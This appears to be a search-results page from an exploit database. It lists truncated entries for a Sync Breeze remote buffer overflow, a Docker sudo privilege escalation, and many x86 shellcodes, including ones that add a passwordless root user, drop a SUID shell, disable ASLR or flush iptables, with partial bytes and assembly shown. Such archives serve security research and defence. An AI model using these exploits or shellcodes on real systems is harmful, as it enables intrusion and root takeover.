5626 matches found
Sync Breeze Enterprise 10.4.18 - Remote Buffer Overflow (SEH) Exploit
Exploit for windows platform in category remote exploits Exploit Title: Sync Breeze Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH Exploit Author: Daniel Teixeira Vendor Homepage: http://www.syncbreeze.com Software Link:...
Sync Breeze Enterprise 10.4.18 - Remote Buffer Overflow (SEH)
Exploit Title: Sync Breeze Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH Date: 29/01/2018 Exploit Author: Daniel Teixeira Vendor Homepage: http://www.syncbreeze.com Software Link: http://www.syncbreeze.com/setups/syncbreezeentsetupv10.4.18.exe Version: 10.4.18 Tested on:...
LabF nfsAxe 3.7 TFTP Client - Local Buffer Overflow Exploit
Exploit for windows platform in category dos / poc !/usr/bin/python Exploit Author: Miguel Mendez Z Exploit Title: LabF nfsAxe v3.7 - TFTP "Input Directory" Local Buffer Overflow Date: 29-01-2018 Software: LabF nfsAxe Version: v3.7 Vendor Homepage: http://www.labf.com Software Link:...
Linux/x86 - Egghunter Shellcode (12 Bytes)
/ Title: Linux/x86 - EggHunter Shellcode 12 Bytes Description: Smallest Null-Free Egg Hunter Shellcode - 12 Bytes Date : 14/Jan/2018 Author: Nipun Jaswal @nipunjaswal ; SLAE-1080 Details: 1. Works with an executable EGG 2. Make sure you clear EDX, EAX registers in the shellcode before any other...
Linux/x86 - Egghunter Shellcode (12 Bytes)
Linux/x86 - Egghunter Shellcode (12 Bytes). Shellcode exploit for Linux/x86 platform / Title: Linux/x86 - EggHunter Shellcode 12 Bytes Description: Smallest Null-Free Egg Hunter Shellcode - 12 Bytes Date : 14/Jan/2018 Author: Nipun Jaswal @nipunjaswal ; SLAE-1080 Details: 1. Works with an executable...
Threat Analysis: Pylot (Travle) Malware Family
The Pylot or Travle malware family appears to be an evolution of the NetTraveler malware family, which has been linked to attackers out of China by numerous sources. Over the last year, a variant has been observed as a secondary payload, often used in conjunction with malicious carrier files typicall...
Linux/x86 - Disable ASLR Security + Obfuscated Shellcode (23 bytes)
Linux/x86 - Disable ASLR Security + Obfuscated Shellcode (23 bytes). Shellcode exploit for Linux/x86 platform ;Title : Linux/x86 - Disable ASLR Security obfuscated shellcode - 23 bytes ;Date : 24 Jan 2018 ;Author : 0xAlaufi ;Tested on : Linux/x86 Ubuntu 12.04.5 global start section .text start: jmp...
Linux/x86 - Disable ASLR Security + Obfuscated Shellcode (23 bytes)
;Title : Linux/x86 - Disable ASLR Security obfuscated shellcode - 23 bytes ;Date : 24 Jan 2018 ;Author : 0xAlaufi ;Tested on : Linux/x86 Ubuntu 12.04.5 global start section .text start: jmp zero2 zero18: mov al,0x4 jmp zero19 zero1a: mov al,0x6 jmp zero1b zeroc: push 0x72702f2f jmp zerod zero12:...
Linux/x86 ROT-N + Shift-N + XOR-N Encoded /bin/sh Shellcode (77 bytes)
/ Description ; Title : ROT-N + Shift-N + XOR-N encoded /bin/sh - Shellcode ; Author : Hashim Jawad ; Blog Post : https://ihack4falafel.com/2018/01/rot-n-shift-n-xor-n-shellcode-encoder-linux-x86/ ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/sh shell ; Tested On : Ubunt...
Linux/x86 - execve(/bin/sh) + ROT-N + Shift-N + XOR-N Encoded Shellcode (77 bytes)
Linux/x86 - execve(/bin/sh) + ROT-N + Shift-N + XOR-N Encoded Shellcode (77 bytes). Shellcode exploit for Linux/x86 platform / Description ; Title : ROT-N + Shift-N + XOR-N encoded /bin/sh - Shellcode ; Author : Hashim Jawad ; Blog Post :...
Docker Sudo Privilege Escalation
!/bin/bash SUDO Docker Privilege Escalation https://github.com/pyperanger/dockerevil SELINUX "bypass" using :z option https://docs.docker.com/engine/admin/volumes/bind-mounts/configure-the-selinux-label echo " SUDO Docker Privilege Escalation"; echo "+ Writing shellcode"; cat /tmp/sud0-d0ck3r.c...
Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (26 bytes)
/ Description ; Title : Polymorphic execve /bin/sh - Shellcode ; Author : Hashim Jawad ; Website : ihack4falafel.com ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/sh shell ; OS : Linux ; Arch : x86 ; Size : 26 bytes sh.nasm global start section .text start: ; zero out EA...
Linux/x86 - Audio (knock knock knock) via /dev/dsp + setreuid(0,0) + execve() Shellcode (566 bytes)
/ Audio knock knock knock via /dev/dsp + setreuid0,0 + execve shellcode. Linux x86 Author: Cody Tubbs loophole of hhp. www.hhp-programming.net / email protected 12/20/2000. F.U. to ph1xry4n. -From me and dxmd... If I ripped this, show me the source... or better yet go barrow a shovel so you can d...
Linux/x86 - fork() + setreuid(0, 0) + execve(cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh) Shellcode (126
/ linux/x86 shamelessly ripped from one of my unpublished exploits / / fork's, does setreuid0, 0; then execve's: /bin/sh -c "cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh" hence dropping a SUID root shell in /tmp. / char shellc = / Shellcode to drop a SUID root shell in /tmp/sh. Forgive the Intel syntax...
Linux/x86 - Add Root User (w000t) + No Password Shellcode (177 bytes)
Linux x86 shellcode that uses execve and echo to create a passwordless root account. Author: zillion Email : email protected Homepage: safemode.org File: w000t-shell.c / This shellcode will add a passwordless local root account 'w000t' Written by email protected Why so big ? it uses execve ;- /...
Linux/x86 - execve(/bin/sh,0,0) Shellcode (21 bytes)
/ linux/x86 execve"/bin/sh",0,0 21 bytes http://www.gonullyourself.org sToRm / char shellcode = // "\x31\xc9" // xor %ecx,%ecx "\xf7\xe1" // mul %ecx "\x51" // push %ecx "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\xb0\x0b" //...
Linux/x86 - execve(/sbin/iptables -F) Shellcode (70 bytes)
Author: zillion Email: email protected Home: http://www.safemode.org Linux x86 shellcode that does an execve of /sbin/iptables -F in order to flush activated firewall rules. File: flush-iptables-shell.c / This shellcode will do /sbin/iptables -F Written by email protected / char shellcode=...
BSD/x86 - execve (/bin/sh) Shellcode (28 bytes)
/ simply execvebinsh shellcode in 28 bytes written on nasm - my first nasm exp. greetz2: mig darknet /EFnet.org dev0id rus-sec /EFnet.org rootteam.void.ru / char shellcode = "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\x3b\x50\xcd" "\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; void...
Linux/x86 - Bind TCP (3879/TCP) Shell (/bin/sh) Shellcode (113 bytes)
/ Connecting shellcode written by lamagra http://lamagra.seKure.de May 2000 .file "connect" .version "01.01" .text .align 4 start: socketAFINET,SOCKSTREAM,IPPROTOIP; movl %esp,%ebp xorl %edx,%edx movb $102,%edx movl %edx,%eax 102 = socketcall xorl %ecx,%ecx movl %ecx,%ebx incl %ebx socket movl...
BSD/x86 - symlink /bin/sh sh Shellcode (39 bytes)
/The shellcode calls the symlink and makes the link to the /bin/sh in the current dir. size = 39 bytes OS = BSD written by /rootteam/dev0id rootteam.void.ru BITS 32 jmp short callme main: pop esi xor eax,eax mov byte esi+7,al mov byte esi+10,al lea ebx,esi+8 push ebx lea ebx,esi push ebx mov al,5...